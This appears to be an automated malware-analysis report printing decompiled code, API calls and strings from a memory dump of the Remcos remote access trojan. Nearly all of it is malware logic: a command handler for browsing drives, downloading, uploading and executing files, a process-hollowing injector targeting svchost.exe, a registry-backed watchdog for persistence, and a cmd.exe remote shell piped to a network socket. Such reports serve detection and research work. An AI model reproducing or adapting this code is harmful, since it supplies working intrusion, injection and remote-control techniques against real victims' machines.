						E004075C2(0x46c238, _t620 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t265);
						E00402084(0x46c238, _t620 - 4, "[ERROR]");
						E00416C80(0x46c238, "[Info]");
						E00401FC7();
						E00401EF0();
					} else {
						E0040427F(0x46c238,  &_v264, E00401F95(E00401E49( &_v348, "Downloading file: ", __eflags)));
						_t277 = E0041733B( &_v244,  &_v268);
						_t550 = "Downloaded file: ";
						E004075C2(0x46c238, _t620 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t277);
						E00402084(0x46c238, _t620 - 4, "[Info]");
						E00416C80(0x46c238, "[Info]");
						E00401FC7();
						E00401EF0();
						E00402084(0x46c238, _t620 - 4 + 0x30 - 0x18, 0x45f6bc);
						_push(0x58);
						E00404AA4(0x46c238,  &_v156, "Downloaded file: ", __eflags);
					}
					E00404E0B( &_v140);
					E00404E2F(0x46c238,  &_v140, 0);
					L15:
					E00401FC7();
					goto L41;
				}
				_t588 = _t575 - 0x61;
				if(_t588 == 0) {
					E0040427F(0x46c238, _t602 - 0x18, E00401F95(E00401E49( &_v264, _t550, __eflags, 0)));
					_t288 = E00401E49( &_v272, _t550, __eflags, 2);
					_t289 = E00401E49( &_v276, _t550, __eflags, 1);
					_t550 = _t288;
					E004169CC(_t289, _t288);
					goto L41;
				}
				_t590 = _t588 - 0x26;
				if(_t590 == 0) {
					GetLogicalDriveStringsA(0x64,  &_v108);
					E004020AB(0x46c238,  &_v252, _t550, __eflags,  &_v108, 0x64);
					__eflags = E00407397( &_v260, 0x45f860, 0, 2) + 1;
					E00401F84(E00407397( &_v260, 0x45f860, 0, 2) + 1);
					E004020EC(0x46c238, _t602 - 0x18, _t550, E00407397( &_v260, 0x45f860, 0, 2) + 1,  &_v276);
					_t300 = E00406406(0x46c238,  &_v256);
					_t550 = E00402FB7( &_v232,  &_v280, 0x46c238);
					E00402F1D(_t602 - 0x18, _t301, _t300);
					_push(0x51);
					E00404AA4(0x46c238, 0x46c2e8, _t301, __eflags);
					E00401FC7();
					E00401FC7();
					goto L15;
				}
				_t592 = _t590 - 1;
				if(_t592 == 0) {
					E0040427F(0x46c238,  &_v256, E00401F95(E00401E49( &_v264, _t550, __eflags, 0)));
					E00407350(0x46c238, _t602 - 0x18, _t550, __eflags,  &_v260);
					E004061C3();
					__eflags = E00402489() - 2;
					_t316 = E0041733B( &_v228, E00407309( &_v264,  &_v240, 0, E00402489() - 2));
					_t550 = "Browsing directory: ";
					E004075C2(0x46c238, _t602 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t569, E00402489() - 2, _t316);
					E00402084(0x46c238, _t602 - 0x18 + 0x18 - 4, "[Info]");
					E00416C80(0x46c238, _t569);
					E00401FC7();
					goto L13;
				}
				_t594 = _t592 - 1;
				if(_t594 == 0) {
					E0040427F(0x46c238,  &_v256, E00401F95(E00401E49( &_v264, _t550, __eflags, 0)));
					ShellExecuteW(0, L"open", E00401EEB( &_v260), 0, 0, 1);
					_t326 = E0041733B( &_v212,  &_v260);
					_t550 = "Executing file: ";
					E004075C2(0x46c238, _t602 - 0x18, "Executing file: ", _t569, __eflags, _t326);
					E00402084(0x46c238, _t602 - 4, "[Info]");
					E00416C80(0x46c238, _t569);
					E00401FC7();
					goto L40;
				} else {
					_t596 = _t594 - 1;
					_t652 = _t596;
					if(_t596 == 0) {
						E004072F6( &_v108);
						_t332 = E00401E49( &_v264, _t550, _t652, 3);
						_t639 = _t602 - 0x18;
						E004020EC(0x46c238, _t639, _t550, _t652, _t332);
						_t334 = E00401E49( &_v272, _t550, _t652, 2);
						_t640 = _t639 - 0x18;
						E004020EC(0x46c238, _t640, _t550, _t652, _t334);
						_t336 = E00401E49( &_v280, _t550, _t652, 1);
						_t641 = _t640 - 0x18;
						E004020EC(0x46c238, _t641, _t550, _t652, _t336);
						_push(E00401F95(E00401E49( &_v288, _t550, _t652, _t596)));
						_t340 = E004064A2( &_v136, _t550);
						_push(_t596);
						_t653 = _t340;
						if(_t340 == 0) {
							E0040427F(0x46c238,  &_v252, E00401F95(E00401E49( &_v368, _t550, __eflags)));
							_t344 = E0041733B( &_v232,  &_v256);
							_t642 = _t641 - 0x18;
							_t550 = "Failed to upload file: ";
							E004075C2(0x46c238, _t642, "Failed to upload file: ", _t569, __eflags, _t344);
							_t542 = _t642 - 0x14;
							_push("[ERROR]");
						} else {
							E0040427F(0x46c238,  &_v252, E00401F95(E00401E49( &_v368, _t550, _t653)));
							_t354 = E0041733B( &_v232,  &_v256);
							_t645 = _t641 - 0x18;
							_t550 = "Uploaded file: ";
							E004075C2(0x46c238, _t645, "Uploaded file: ", _t569, _t653, _t354);
							_t542 = _t645 - 0x14;
							_push("[Info]");
						}
						E00402084(0x46c238, _t542);
						E00416C80(0x46c238, _t569);
						E00401FC7();
						E00401EF0();
						L00407304(0x46c238,  &_v132, _t596);
					}
					goto L41;
				}
			}

0x0040697d
0x0040697d
0x0040698d
0x0040698f
0x00406992
0x00406997
0x0040699f
0x004069b9
0x004069c3
0x004069c8
0x004069d3
0x004069d8
0x004069e5
0x004069ee
0x004069f8
0x004069fb
0x004069fd
0x00406fad
0x00406fad
0x00406fb3
0x00407198
0x004071a7
0x004071b1
0x004071b3
0x004071c9
0x004071b5
0x004071bc
0x004071bc
0x004071cf
0x004071d8
0x004071da
0x00407201
0x00407206
0x0040720b
0x00407212
0x0040721f
0x00407224
0x00407227
0x0040722f
0x00407234
0x00407237
0x00407239
0x004071dc
0x004071e0
0x004071e5
0x004071e8
0x004071f0
0x004071f5
0x004071f8
0x004071fa
0x004071fa
0x0040723e
0x00407243
0x00407248
0x0040724f
0x0040725a
0x0040725f
0x00407264
0x00407266
0x0040726b
0x0040726d
0x004072c4
0x004072c8
0x004072cd
0x004072d1
0x004072dd
0x004072e6
0x004072f3
0x0040726f
0x0040727a
0x00407280
0x00407287
0x0040729a
0x004072a3
0x004072b7
0x004072bc
0x004072bc
0x00000000
0x004072c1
0x0040726d
0x00406fb9
0x00406fb9
0x00406fbc
0x00407097
0x004070b3
0x004070cf
0x004070e9
0x004070f9
0x00407108
0x0040710a
0x0040710f
0x0040710f
0x00407112
0x00407150
0x00407154
0x0040715a
0x00407161
0x0040716a
0x00407114
0x00407117
0x00407122
0x00407128
0x0040712d
0x00407173
0x00406c5f
0x00406c5f
0x00000000
0x00406c5f
0x00406fc2
0x00406fc2
0x00406fc5
0x00407022
0x00407035
0x0040703b
0x00407051
0x0040705b
0x00407066
0x00407075
0x00000000
0x00407075
0x00406fc7
0x00406fc7
0x00406fca
0x00406fe2
0x00406ffc
0x00407000
0x00407000
0x00000000
0x00406fca
0x00406a03
0x00406d53
0x00406d61
0x00406d77
0x00406d78
0x00406d79
0x00406d7a
0x00406d7b
0x00406d86
0x00406d8b
0x00406d98
0x00406dd2
0x00406de1
0x00406dea
0x00406df3
0x00406dfc
0x00406e19
0x00406e26
0x00406e2b
0x00406e36
0x00406e3b
0x00406e46
0x00406e4b
0x00406e57
0x00406e60
0x00406e71
0x00406e76
0x00406e7c
0x00406ea8
0x00406ead
0x00406eb4
0x00406eb5
0x00406eb7
0x00406f41
0x00406f4e
0x00406f56
0x00406f5e
0x00406f6d
0x00406f72
0x00406f7e
0x00406f87
0x00406eb9
0x00406eca
0x00406ed7
0x00406edf
0x00406ee7
0x00406ef2
0x00406ef7
0x00406f03
0x00406f0c
0x00406f1b
0x00406f20
0x00406f29
0x00406f29
0x00406f93
0x00406f9f
0x00406cff
0x00406cff
0x00000000
0x00406cff
0x00406a09
0x00406a0c
0x00406d21
0x00406d2c
0x00406d39
0x00406d3e
0x00406d42
0x00000000
0x00406d47
0x00406a12
0x00406a15
0x00406c73
0x00406c87
0x00406c9e
0x00406ca4
0x00406cb3
0x00406cbc
0x00406cd3
0x00406cd7
0x00406cdd
0x00406ce4
0x00406ced
0x00406cf6
0x00000000
0x00406cfb
0x00406a1b
0x00406a1e
0x00406be8
0x00406bf7
0x00406bfc
0x00406c0d
0x00406c26
0x00406c2e
0x00406c36
0x00406c45
0x00406c4a
0x00406c56
0x00000000
0x00406c5b
0x00406a24
0x00406a27
0x00406b6f
0x00406b88
0x00406b96
0x00406b9e
0x00406ba6
0x00406bb5
0x00406bba
0x00406bc6
0x00000000
0x00406a2d
0x00406a2d
0x00406a2d
0x00406a30
0x00406a3d
0x00406a48
0x00406a4d
0x00406a53
0x00406a5e
0x00406a63
0x00406a69
0x00406a74
0x00406a79
0x00406a7f
0x00406a95
0x00406a9d
0x00406aa6
0x00406aa7
0x00406aa9
0x00406afb
0x00406b08
0x00406b0d
0x00406b10
0x00406b18
0x00406b20
0x00406b22
0x00406aab
0x00406abc
0x00406ac9
0x00406ace
0x00406ad1
0x00406ad9
0x00406ae1
0x00406ae3
0x00406ae3
0x00406b27
0x00406b2c
0x00406b38
0x00406b41
0x00406b4d
0x00406b4d
0x00000000
0x00406a30

APIs

SetEvent.KERNEL32(?,?), ref: 0040699F
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406B88

Part of subcall function 004064A2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED

Part of subcall function 004062D8: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,[Info],00000000,0046C238,?,00406EAD,00000000), ref: 00406331
Part of subcall function 004062D8: WriteFile.KERNEL32(?,?,00000000,00406EAD,00000000,?,000186A0,00406EAD,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 00406379
Part of subcall function 004062D8: CloseHandle.KERNEL32(00000000,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 004063B3
Part of subcall function 004062D8: MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

GetLogicalDriveStringsA.KERNEL32 ref: 00406C73
StrToIntA.SHLWAPI(00000000,?), ref: 00406FE2
CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 00407051

Part of subcall function 004061C3: FindFirstFileW.KERNEL32(00000000,?,?,0046C238), ref: 004061DE

Strings

open, xrefs: 00406B82
Downloaded file: , xrefs: 00406EDF
[Info], xrefs: 00406AE3, 00406BB0, 00406C40, 00406E3E, 00406E45, 00406EF1, 004071FA
Failed to upload file: , xrefs: 00406B10
[ERROR], xrefs: 00406B22, 00406F68, 00407239
Browsing directory: , xrefs: 00406C2E
Executing file: , xrefs: 00406B9E
Failed to download file: , xrefs: 00406F56
Downloading file: , xrefs: 00406E2E
Deleted file: , xrefs: 004071E8
Uploaded file: , xrefs: 00406AD1
Unable to rename file!, xrefs: 0040713B
Unable to delete: , xrefs: 00407227

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[ERROR]$[Info]$open
API String ID: 4189642951-1986272625
Opcode ID: a01002e2a7040f8e56e615568d966f15b4a24b71adf8afd063430daddc13f2bd
Instruction ID: 2a12d23acd30ce868743ee3b5d09fdf4f29f8ef519bcce84dbcc6bced154e8ad
Opcode Fuzzy Hash: a01002e2a7040f8e56e615568d966f15b4a24b71adf8afd063430daddc13f2bd
Instruction Fuzzy Hash: BD3292716183015BC608F776C8569AF77A9AF91348F40093FF942671E3EF389A09C69B

Uniqueness

Uniqueness Score: -1.00%

Function 0041412B, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041412B(WCHAR* __ecx, char __edx, struct _PROCESS_INFORMATION* _a4) {
				void _v8;
				signed int _v12;
				char _v16;
				CONTEXT* _v20;
				WCHAR* _v24;
				struct _STARTUPINFOW _v92;
				void* __edi;
				void* _t58;
				void* _t72;
				void* _t73;
				int _t83;
				intOrPtr* _t95;
				void* _t98;
				signed int _t102;
				intOrPtr _t104;
				void* _t106;
				CONTEXT* _t110;
				void* _t113;
				CONTEXT* _t114;
				struct _PROCESS_INFORMATION* _t116;

				_v8 = _v8 & 0x00000000;
				_v16 = __edx;
				_v24 = __ecx;
				if( *((intOrPtr*)(__edx)) == 0x5a4d) {
					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					if( *_t95 == 0x4550) {
						_push(_t106);
						E00431F00(_t106,  &_v92, 0, 0x44);
						_t116 = _a4;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
							L21:
							_t58 = 0;
							L22:
							L23:
							return _t58;
						}
						CloseHandle(_v92.hStdInput);
						CloseHandle(_v92.hStdOutput);
						CloseHandle(_v92.hStdError);
						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
						_v20 = _t110;
						_t110->ContextFlags = 0x10007;
						if(GetThreadContext(_t116->hThread, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
							L20:
							TerminateProcess(_t116->hProcess, 0);
							CloseHandle(_t116->hProcess);
							CloseHandle(_t116->hThread);
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							goto L21;
						} else {
							_t72 = _v8;
							if(_t72 ==  *(_t95 + 0x34)) {
								NtUnmapViewOfSection(_t116->hProcess, _t72);
							}
							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
							_v24 = _t73;
							if(_t73 == 0) {
								goto L20;
							} else {
								_t22 =  &_v16; // 0x41433b
								_t113 =  *_t22;
								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
									goto L20;
								}
								_v12 = _v12 & 0x00000000;
								if(0 >=  *(_t95 + 6)) {
									L14:
									_t98 = _t95 + 0x34;
									_t114 = _v20;
									if(_v8 ==  *_t98) {
										L17:
										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
										if(SetThreadContext(_t116->hThread, _t114) == 0 || ResumeThread(_t116->hThread) == 0xffffffff) {
											goto L20;
										} else {
											_t58 = 1;
											goto L22;
										}
									}
									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
									if(_t83 != 0) {
										goto L17;
									}
									TerminateProcess(_t116->hProcess, _t83);
									goto L21;
								}
								_t104 = 0;
								_v16 = 0;
								do {
									WriteProcessMemory( *_t116,  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x10c)) + _t113,  *( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x108), 0);
									_t37 =  &_v16; // 0x41433b
									_t102 = _v12 + 1;
									_t104 =  *_t37 + 0x28;
									_v12 = _t102;
									_v16 = _t104;
								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
								goto L14;
							}
						}
					}
					_t58 = 0;
					goto L23;
				}
				return 0;
			}

0x00414131
0x0041413a
0x0041413d
0x00414143
0x00414150
0x00414158
0x00414162
0x0041416b
0x00414170
0x0041417a
0x0041417c
0x0041417d
0x0041417e
0x00414198
0x00414322
0x00414322
0x00414324
0x00414326
0x00000000
0x00414326
0x004141a7
0x004141ac
0x004141b1
0x004141c4
0x004141c7
0x004141ca
0x004141db
0x00414301
0x00414305
0x00414313
0x00414318
0x0041431e
0x0041431f
0x00414320
0x00414321
0x00000000
0x00414203
0x00414203
0x00414209
0x0041420e
0x0041420e
0x00414223
0x00414229
0x0041422e
0x00000000
0x00414234
0x00414234
0x00414234
0x00414248
0x00000000
0x00000000
0x0041424e
0x00414258
0x004142a2
0x004142a5
0x004142a8
0x004142ad
0x004142d5
0x004142dc
0x004142ed
0x00000000
0x004142fd
0x004142fd
0x00000000
0x004142fd
0x004142ed
0x004142c0
0x004142c8
0x00000000
0x00000000
0x004142cd
0x00000000
0x004142cd
0x0041425a
0x0041425c
0x0041425f
0x00414284
0x0041428d
0x00414290
0x00414295
0x00414298
0x0041429b
0x0041429e
0x00000000
0x0041425f
0x0041422e
0x004141db
0x0041415a
0x00000000
0x0041415a
0x00000000

Strings

;CA, xrefs: 00414234, 0041428D, 0041423C

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ;CA
API String ID: 0-233881251
Opcode ID: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
Instruction ID: bd197fad053dbfc90d5835daa1a59b9970fe7a36a364e2f4af16486f2ac585b0
Opcode Fuzzy Hash: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
Instruction Fuzzy Hash: 09518D70600604BFEB108FA5CC45FAABBB9FF84742F144065FA54E62A1C775D990DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAC7, Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 194
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040FAC7(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				char _v84;
				void* _v88;
				char _v100;
				char _v104;
				void* _v108;
				char _v124;
				char _v128;
				long _v132;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				void* _t29;
				void* _t35;
				void* _t46;
				void* _t61;
				void* _t78;
				void* _t107;
				long _t112;
				long _t141;
				void* _t142;
				CHAR* _t143;
				void* _t145;
				signed int _t147;
				void* _t149;
				void* _t155;

				_t149 = (_t147 & 0xfffffff8) - 0x7c;
				_push(_t142);
				_t26 = GetCurrentProcessId();
				if(E00410BB0(0x46c518, E00401F95(0x46c518), "WD", _t26) != 0) {
					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
					__eflags = _t29;
					if(_t29 == 0) {
						E004020D5(0x46c518,  &_v100);
						E004179DC(E00401EEB(0x46c500),  &_v100);
						E00401F6D(0x46c518,  &_v124);
						__eflags = E00417614( &_v124);
						if(__eflags != 0) {
							_t35 = E0040427F(0x46c518,  &_v76, L"\\SysWOW64");
							E00401EFA( &_v132, _t37, _t142, E00403030( &_v36, E0040427F(0x46c518,  &_v56, E0043987F(0x46c518,  &_v76, __eflags, L"WinDir")), _t35));
							E00401EF0();
							E00401EF0();
						} else {
							_t61 = E0040427F(0x46c518,  &_v28, L"\\system32");
							E00401EFA( &_v132, _t63, _t142, E00403030( &_v84, E0040427F(0x46c518,  &_v56, E0043987F(0x46c518,  &_v28, __eflags, L"WinDir")), _t61));
							E00401EF0();
							E00401EF0();
						}
						E00401EF0();
						E0040766C(0x46c518,  &_v124, 0, L"\\svchost.exe");
						_t143 = E00401F95( &_v104);
						_t46 = E0041412B(E00401EEB( &_v128), _t143, 0x46bd50);
						_t150 = _t149 - 0x18;
						_t107 = _t149 - 0x18;
						__eflags = _t46;
						if(_t46 != 0) {
							E00402084(0x46c518, _t107, "Watchdog module activated");
							E00402084(0x46c518, _t150 - 0x18, "[Info]");
							E00416C80(0x46c518, 0);
							Sleep(0x7d0);
							_t112 =  *0x46bd58; // 0x0
							goto L13;
						}
						E00402084(0x46c518, _t107, "Watchdog launch failed!");
						E00402084(0x46c518, _t150 - 0x18, "[ERROR]");
						E00416C80(0x46c518, 0);
						CloseHandle( *0x46bd60);
						E00401EF0();
						E00401FC7();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t29);
						_t155 = _t149 - 0x18;
						E00402084(0x46c518, _t155, "Remcos restarted by watchdog!");
						_t156 = _t155 - 0x18;
						E00402084(0x46c518, _t155 - 0x18, "[Info]");
						E00416C80(0x46c518, 0);
						E00402084(0x46c518, _t156 + 0x18, "Watchdog module activated");
						E00402084(0x46c518, _t156 + 0x18 - 0x18, "[Info]");
						E00416C80(0x46c518, 0);
						CreateThread(0, 0, E004100F9, 0, 0, 0);
						_t143 = "WDH";
						_t78 = E00410885(E00401F95(0x46c518), _t143,  &_v148);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L1;
						} else {
							 *0x46bd50 = OpenProcess(0x1fffff, 0, _v132);
							E00410CE2(E00401F95(0x46c518), __eflags, _t143);
							_t112 = _v132;
							L13:
							L14();
							asm("int3");
							_push(_t143);
							_push(0);
							_t141 = _t112;
							L15:
							_t145 = OpenProcess(0x100000, 0, _t141);
							WaitForSingleObject(_t145, 0xffffffff);
							CloseHandle(_t145);
							__eflags =  *0x46bd4e;
							if(__eflags != 0) {
								E0040FAC7(__eflags, 0);
							}
							goto L15;
						}
						L17:
					}
				} else {
					L1:
				}
				return 1;
				goto L17;
			}

0x0040facd
0x0040fad1
0x0040fad3
0x0040faf6
0x0040fb0d
0x0040fb13
0x0040fb15
0x0040fba4
0x0040fbb9
0x0040fbc2
0x0040fbcc
0x0040fbce
0x0040fc2b
0x0040fc57
0x0040fc60
0x0040fc69
0x0040fbd0
0x0040fbd9
0x0040fc05
0x0040fc0e
0x0040fc17
0x0040fc1c
0x0040fc72
0x0040fc80
0x0040fc97
0x0040fca2
0x0040fca8
0x0040fcab
0x0040fcad
0x0040fcaf
0x0040fcb6
0x0040fcc5
0x0040fcca
0x0040fcd7
0x0040fcdd
0x00000000
0x0040fcdd
0x0040fcea
0x0040fcf9
0x0040fcfe
0x0040fd0c
0x0040fd16
0x0040fd1f
0x0040fd24
0x0040fd26
0x0040fb1b
0x0040fb1c
0x0040fb22
0x0040fb2c
0x0040fb31
0x0040fb3c
0x0040fb41
0x0040fb50
0x0040fb5b
0x0040fb60
0x0040fb72
0x0040fb7c
0x0040fb8c
0x0040fb93
0x0040fb95
0x00000000
0x0040fb9b
0x0040fd43
0x0040fd4f
0x0040fd55
0x0040fd59
0x0040fd59
0x0040fd5e
0x0040fd5f
0x0040fd60
0x0040fd61
0x0040fd63
0x0040fd71
0x0040fd76
0x0040fd7d
0x0040fd83
0x0040fd8a
0x0040fd8e
0x0040fd8e
0x00000000
0x0040fd8a
0x00000000
0x0040fb95
0x0040faf8
0x0040faf8
0x0040fafa
0x0040fd2d
0x00000000

APIs

GetCurrentProcessId.KERNEL32 ref: 0040FAD3

Part of subcall function 00410BB0: RegCreateKeyA.ADVAPI32(80000001,00000000,0045F6BC), ref: 00410BBE
Part of subcall function 00410BB0: RegSetValueExA.ADVAPI32(0045F6BC,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040A669,0045FEF8,00000001,000000AF,0045F6BC), ref: 00410BD9
Part of subcall function 00410BB0: RegCloseKey.ADVAPI32(0045F6BC,?,?,?,0040A669,0045FEF8,00000001,000000AF,0045F6BC), ref: 00410BE4

OpenMutexA.KERNEL32 ref: 0040FB0D
CloseHandle.KERNEL32(00000000), ref: 0040FB1C
CreateThread.KERNEL32(00000000,00000000,004100F9,00000000,00000000,00000000), ref: 0040FB72
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD3A

Strings

WinDir, xrefs: 0040FBDF, 0040FC31
WDH, xrefs: 0040FB7C, 0040FB82, 0040FD40
Watchdog launch failed!, xrefs: 0040FCE5
[Info], xrefs: 0040FB34, 0040FB3B, 0040FB5A, 0040FCC0
Remcos restarted by watchdog!, xrefs: 0040FB27
\system32, xrefs: 0040FBD0
[ERROR], xrefs: 0040FCF4
\svchost.exe, xrefs: 0040FC77
\SysWOW64, xrefs: 0040FC22
Mutex_RemWatchdog, xrefs: 0040FB00
Watchdog module activated, xrefs: 0040FB4B, 0040FCB1

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
API String ID: 3018269243-3797382479
Opcode ID: 9e7962662ee2d71a2bfb1219488584e3dbb1d2bfd0aa3992875f53d151df0142
Instruction ID: b085b79558e0c22ee18e78a7f4af536a5d5efbf70cd450b3fa531ddec726aa5e
Opcode Fuzzy Hash: 9e7962662ee2d71a2bfb1219488584e3dbb1d2bfd0aa3992875f53d151df0142
Instruction Fuzzy Hash: 545120316043015BC218BB72CC1B8AF37699E91749F50043FF946721E2EE789909C6AF

Uniqueness

Uniqueness Score: -1.00%

Function 004055EA, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 283
pipesleepfileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004055EA(char _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v40;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				int _t98;
				intOrPtr* _t107;
				intOrPtr _t138;
				signed int _t146;
				signed int _t147;
				long _t151;
				void* _t155;
				intOrPtr* _t156;
				void* _t163;
				void* _t168;
				void* _t175;

				_t156 = _t155 - 0x3c;
				_push(_t146);
				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
				_t147 = _t146 | 0xffffffff;
				_t98 = 0;
				if( *0x46dce8 >  *((intOrPtr*)(_t138 + 4))) {
					E0042F114(0x46dce8);
					_t160 =  *0x46dce8 - _t147;
					if( *0x46dce8 == _t147) {
						E0040484E(0, 0x46dc60, 0);
						E0042F49E(_t160, E004527B3);
						 *_t156 = 0x46dce8;
						E0042F0D5(_t147);
					}
				}
				if( *0x46dcc8 >  *((intOrPtr*)(_t138 + 4))) {
					E0042F114(0x46dcc8);
					_t162 =  *0x46dcc8 - _t147;
					if( *0x46dcc8 == _t147) {
						E004020D5(_t98, 0x46dcf0);
						E0042F49E(_t162, E004527A9);
						E0042F0D5(_t147, 0x46dcc8);
					}
				}
				_t100 =  &_v40;
				E004020D5(_t98,  &_v40);
				_t139 = 0x46c2d0;
				_v8 = _t98;
				_t163 =  *0x46bae2 - _t98; // 0x0
				if(_t163 != 0) {
					L12:
					_v12 = _t98;
					PeekNamedPipe( *0x46dcd0, _t98, _t98, _t98,  &_v12, _t98);
					if(_v12 <= _t98) {
						_t156 = _t156 - 0x18;
						E00402084(_t98, _t156, 0x45f6bc);
						_push(0x62);
						_t147 = E00404AA4(_t98, 0x46dc60, _t136, __eflags);
						goto L21;
					}
					_push(_v12);
					_t56 = E004394F6(_t100);
					_t140 = _t56;
					ReadFile( *0x46dcd0, _t56, _v12,  &_v16, _t98);
					if(_v16 <= _t98) {
						L19:
						L004394F1(_t140);
						_t139 = 0x46c2d0;
						goto L21;
					}
					if(_v8 <= _t98) {
						L17:
						E00402084(_t98,  &_v64, _t140);
						_t156 = _t156 - 0x18;
						_t107 = _t156;
						_push(_v16);
						_push(_t98);
						L18:
						E00405A14(_t98, _t107, _t136, _t172);
						_t147 = E00404AA4(_t98, 0x46dc60, _t136, _t172, 0x62,  &_v64);
						E00401FC7();
						goto L19;
					}
					_t66 = E00439510(_t140, E00401F95( &_v40), _v8);
					_t156 = _t156 + 0xc;
					_t172 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E00402084(_t98,  &_v64, _t140);
					_t156 = _t156 - 0x18;
					_t107 = _t156;
					_push(_v16 - _v8);
					_push(_v8);
					goto L18;
				} else {
					_t136 = "cmd.exe";
					_t70 = E00405A6F("cmd.exe");
					_t164 = _t70;
					if(_t70 == 0) {
						L26:
						E00404E0B(0x46dc60);
						CloseHandle( *0x46dcd0);
						CloseHandle( *0x46dcec);
						 *0x46bae2 = _t98;
						_t98 = 1;
						L27:
						E00401FC7();
						E00401FC7();
						return _t98;
					}
					E00405A0B(_t98, 0x46dcf0, E0043988A(_t98, _t164, "SystemDrive"));
					E00405A02(_t98, 0x46dcf0, 0x46c2d0, "\\");
					0x46dc08->nLength = 0xc;
					 *0x46dc10 = 1;
					 *0x46dc0c = _t98;
					if(CreatePipe(0x46dce4, 0x46dccc, 0x46dc08, _t98) == 0 || CreatePipe(0x46dcd0, 0x46dcec, 0x46dc08, _t98) == 0) {
						goto L27;
					} else {
						_t151 = 0x44;
						E00431F00(0x46dc18, 0x46dc18, _t98, CreatePipe);
						0x46dc18->cb = _t151;
						 *0x46dc44 = 0x101;
						 *0x46dc48 = 0;
						 *0x46dc50 =  *0x46dce4;
						_t79 =  *0x46dcec;
						 *0x46dc54 = _t79;
						 *0x46dc58 = _t79;
						_t80 = E00401F95(0x46dcf0);
						 *0x46bae2 = CreateProcessA(_t98, E00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4) != 0;
						E00405A0B(_t98, 0x46c2d0, 0x45f6bc);
						 *0x46bae3 = 1;
						E0040498B(0x46dc60);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E00404A08("cmd.exe");
						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
